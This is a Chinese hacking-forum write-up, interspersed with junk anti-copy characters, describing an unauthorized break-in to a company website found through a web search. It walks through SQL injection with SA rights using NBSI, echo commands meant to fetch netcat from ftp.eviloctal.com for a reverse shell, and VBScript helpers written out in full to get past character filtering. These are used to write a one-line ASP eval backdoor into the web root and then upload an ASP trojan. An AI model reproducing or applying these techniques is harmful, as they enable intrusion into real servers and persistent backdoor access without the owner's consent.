作者:haicao [E.S.T]' K2 M( E, l% k4 M7 I
$ o& X# X) ^; c, A
今天在网上看到一个动画,动画里说那些大公司的安全做的怎么怎么差,所以我便决定找个看看,在GOOGLE随便输入了"集团",搜索到的第一页随便点击就进了一家公司的网站。随便点了一个连接加了一个单引号4 O" J& f' _/ [: y. ^; b6 [2 K4 G b, R I
http://www.xxx.com.cn/gushi.asp?pid=8&cid=111' 7 D9 Q. m. l% K8 o* i
晕,返回错误:
2 g" X1 p( } [Microsoft VBScript 编译器错误 错误 '800a03f6'
. y/ \. \; d7 _- R* w v4 x* c' d! o/ K" K4 X6 H, Y) C) u/ O3 _
缺少 'End' + V( V9 Q7 P7 O1 G
8 J- G5 j. r, v4 e- H* ?) K' F8 g& ~2 S
/iisHelp/common/500-100.asp,行242
: b& t0 V' P, p/ p$ V1 _: J% `. Q: X# b9 V
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14'
! B% M5 m% i! ~: w* \
, }( z8 Y+ l9 m" s4 N[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' 之前有未闭合的引号。 1 I# g. S c# D# [4 _( x
) y* X1 P- q5 I" s. a- Z
/inc/artid.inc,行8 4 ?# a5 Z! A X G- |( i
返回的信息说明是SQL Server' h. \0 R+ ]2 z: x1 H4 O, N
ping www.xxx.com.cn后返回IP:61.XX.XX.68通过IP可以直接访问这个网站,说明是独立的服务器。
6 R) S2 [- H" I2 V6 L% F3 K- Y% ^" f6 m K我一下来了兴致看来是家有钱的大公司,用NBSI检测了下这个连接,竟然是SA权限的!2 g% _5 o* C% C$ t0 K
2 u# @5 U8 c: H, Y K2 d- y
8 z1 r4 W, U0 }* Y* x
我用SUPERSCAN扫描了这台主机的开放端口只开放了80及8080端口(都是提供web服务,看来是装了_blank">防火墙,意料之中)。这样的话直接添加用户开3389什么都失去了意义了。只好重新理清头绪。
1 |, K5 w: H5 _8 A1 q6 f9 R9 ~首先想到的是用ECHO写一个ftp.txt文件然后执行ftp -s:ftp.txt来下载一个nc在NBSI里执行命令反向连接过来就可以得到它的系统权限了,但在用ECHO写文件时又出了问题了,我输入一条ECHO命令竟然执行了四次。如图我输入命令 echo open ftp.eviloctal.com>>e:\xxxweb\app\3.txt(e:\xxxweb为网站根目录)竟然往文件里写入了四次这样的话直接用ftp.txt下载文件肯定没戏。) s0 |% H, h P( h' j6 o: E
' y( L. J; V1 i! H$ u" h
- i. k- P Y+ n6 p1 e
1 F: P5 O& ]3 K& B(特别提示:用NBSI执行命令的时侯最好不要勾选尝试返回结果,因为执行命令会很慢很慢,而用重定向符">>"把命令的执行结果重定向输出到web目录比如dir c:\可以写成dir c:\ >> e:\xxxweb\app\1.txt这样速度很快然后通过浏览器查看命令执行结果浏览http://www.xxx.com.cn/app/1.txt e:\xxxweb为网站的根目录)! C4 _' A! Z: H0 Q' c; m
8 h( }5 j/ m2 F2 t" h) L4 u如果能把那个一句话的后门(服务端:)写到WEB目录就好办了,但是不管怎么ECHO %也被过滤掉了。在本地执行echo ^的文件,但在NBSI里执行时无论如何生成的文件中%被过滤了。内容变成:
! V0 C) w& @% {) C4 D! b2 E) G
% y5 {- R9 c" B8 p <execute request("l")> % y# ~8 ~% c4 U, b0 o6 t) u! _
<execute request("l")>
! ~$ S0 q) {. R5 P- @- [<execute request("l")> + k) T2 q4 G. T j. M! i5 z* K
<execute request("l")> & b9 s5 P6 H) p: D; T" e- |. C4 a
( L0 H6 X; R; T# \
, S; w) [/ t3 w这样的话,就没办法直接写一句话的ASP服务端后门了。(内容为四句原因同上)我想到了先写一个VBS脚本然后把要写的文件内容作为参数传递给VBS脚本去处理生成相应的文件。
# J# g( u2 m2 c3 x* s" z8 v. ?# Z写文件的脚本writefile.vbs(命令格式为cscript writefile.vbs "要写的字串" 目标文件)内容为:
+ X6 ^3 Q3 [7 {( k( u. W) J1 Uon error resume next:x=1:. _; n$ ^* a! G U c( p2 d) Y
str=replace(Wscript.Arguments(0),"==",vbcrlf): '将==替换回车
* K. v* |+ P/ ~. Lstr=replace(str,"**",""""): ‘将**替换为符号"
1 n+ H9 D9 R( ?9 Wstr=replace(str,"--",chr(38)): ‘将--替换为符号 &- Q' m/ k/ n$ u% k& `+ u5 N" v
str=replace(str,"@@",chr(37)): '将@@替换符号%
, D9 {: D* ]0 e5 S$ u. N4 pSet fso = CreateObject("Scripting.FileSystemObject"):
1 e, L( R" h$ d) }( y+ m: cSet a = fso.CreateTextFile(Wscript.Arguments(1),true): ‘创建文件,文件名为执行时给出的第二个参数
% x; T: f' M! Wif x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:8 ^2 |$ ~2 c+ Y7 @' |5 x
这个文件得用ECHO命令把它写到服务器上xxx.vbe或xxx.vbs,然后用这个VBS写我们要的文件。(上面中因为像",%,&,回车符 是不能直接作为参数传递给脚本文件的,所以还需要对这些字符进行替换。下面的脚本trans.vbs将完成相反的过程)
/ {* f9 }) Q6 P7 h简单解释一下:第一条语句是最重要的,容错语句不管后面的程序出了什么错都继续执行。其次是IF语句,为了避免多条语句重复向文件写入同样的内容用了一个标志若x=1才执行写文件,写完马上把x赋值为2。其次可能你会感到奇怪为什么每条语句后加了:,其实是因为我考虑到如果在同一行有多条相同的语句的时侯可以保证程序还能执行。比如:
4 z) G! v5 W: e- t3 R) G9 }" @/ gstr=replace(Wscript.Arguments(0),"==",vbcrlf):str=replace(Wscript.Arguments(0),"==",vbcrlf):1 f5 J6 J0 V( [1 G1 g& D7 o
若写成str=replace(Wscript.Arguments(0),"==",vbcrlf)4 c- y6 N+ w' G, u5 r3 A
则一行显示多条相同语句时变成
2 u' Y# ~ s. T! q! X) `str=replace(Wscript.Arguments(0),"==",vbcrlf)str=replace(Wscript.Arguments(0),"==",vbcrlf); z0 c! R2 s# C8 X
这样程序便不能正常执行了。
# a0 o8 h6 @4 p W( @2 Q# S% N- R",%,&,回车符 是不能直接作为参数传递给脚本文件,容易看出用==代替了回车,用**代替了双引号,用--代替了&,用@@代替了%.在执行写文件得先把我们要写的文件比如转换成writefile.vbs可以接受的格式。用下面的脚本转换trans.vbs(命令格式为cscript trans.vbs 源文件 目标文件):- Q* \5 f. J5 x2 j7 Y$ x
on error resume next
3 Z( j* k0 l2 t& Y7 hif Wscript.Arguments.count<>2 then + _( z9 n0 t5 s7 _5 `3 z; ?3 q
wscript.echo "参数有误啦 格式为:cscript trans.vbs 源文件 目标文件"
% p6 R6 p6 A( p; l wscript.quit
# c6 W6 _7 y! }/ [end if
3 f: ]- l% ^2 @5 W& N$ b n$ O, {Set fso=CreateObject("Scripting.FileSystemObject")
& ^* l# y/ d1 D0 e( P, y: aSet a=fso.openTextFile(Wscript.Arguments(0)); J4 _+ q: N2 A0 \
str=a.readall
3 {6 G- E, e M) N+ r/ N* t& G- ?str=replace(str,"""","**") '把双引号替换成**
4 H& o0 S0 v* Q7 x3 I: [str=replace(str,vbcrlf,"==") '把回车替换成==
, `( e; W' g3 {8 u+ u8 E1 nstr=replace(str,"&","--") '把&号替换成--! H3 b9 m( A4 \% l" {, z. @. p3 @
str=replace(str,"%","@@") '把%替换成@@+ [1 u6 {: X. {% w( z8 ^1 Q# j; V
wscript.echo str
3 Q0 O( N+ U5 D" I' ^Set a=fso.CreateTextFile(Wscript.Arguments(1), True)
; D: S+ t. W# O; D5 Ca.Write(str)
7 b/ G' T. Z- U2 ~5 Q
) H/ N. O L& U! r# {: D在本地执行cscript trans.vbs one.txt onetrans.txt
Q; R2 e6 n- f- `# V- r8 z其中one.txt为我们的一句话后门内容为:8 E' I+ _7 T" B5 M4 w
转换后内容存在onetrans.txt中内容变成转换后的:<@@execute request(**l**)@@>保存在文件onetrans.txt中。
/ z$ t* D2 C- _writefile.vbs的ECHO代码为:4 B# h" d7 P$ d. T: A8 {
echo on error resume next:x=1:>>writefile.vbe/ ]& a% K9 {8 T$ ^9 q$ [2 y
echo str=replace(Wscript.Arguments(0),"==",vbcrlf):>>writefile.vbe 5 i3 Z) K, @ A% k) _6 u& ~
echo str=replace(str,"**",""""):>>writefile.vbe
2 W" a# h8 r& {: b4 Z! Secho str=replace(str,"--",chr(38)):>>writefile.vbe , Y" Q; ~9 S* k' E7 ]) v2 `
echo str=replace(str,"@@",chr(37)):>>writefile.vbe : i6 M9 u9 }; j! @
echo Set fso = CreateObject("Scripting.FileSystemObject"):>>writefile.vbe; a. U! H' Q# A2 R r* r8 [2 K& [
echo Set a = fso.CreateTextFile(Wscript.Arguments(1),true):>>writefile.vbe
* {9 Z! m' G% O2 y7 G$ v5 gecho if x=1 then a.Write(str):x=2:set fso=nothing:set a=nothing end if:>>writefile.vbe/ `# c2 Y* M' t' |5 u: @9 ]& V
, C& V3 ^1 ]3 L; {& h W: Z. {
把上面的命令一句句拿到NBSI的NB Commander 命令执行器上执行一下就在对方的系统目录下写进了一个文件writefile.vbe,接着就可以把一句话的服务器的后门写到对方WEB目录下了!命令为:" V; W% z1 _) Q3 W7 t6 n" z- k
cscript writefile.vbe "<@@execute request(**l**)@@>" d:\web\app\1.asp (注意当传递给脚本的参数中含空格时一定得用两个双引号括起来!)& G. u) y9 Z l1 ?; L2 m
相应的地址为:http://www.xxx.com.cn/app/1.asp9 N( S9 x" ^2 q3 ]6 | E* `
把post.htm的form action指向这个地址我们就可以在本地把我们的木马上传到服务器上了!如图:
j; I) ?5 I2 C* p/ g5 e5 L' g! B7 h% J* C* X1 l
* j6 S: P! o. d
执行post.htm在下面的文本框中粘贴一下我们用来保存文件的ASP木马。并点击upload当成功转向EST论坛时说明ASP木马上传成功了!* G8 Z- G; J: A" C; h- P
# o- D; l8 J" q我很顺利的把保存文件的木马上传到了服务器上文件名为advv.asp.如图:
. n% V" m* i) f4 [# I; e1 b6 F, i' P: |
我把这个木马加了验证所以必须得通过这个url才能顺利访问:% _7 R* K2 q; k( G2 S# @
http://www.xxx.com.cn/app/advv.asp?id=haicao (当未加参数id=haicao时显示空页面) |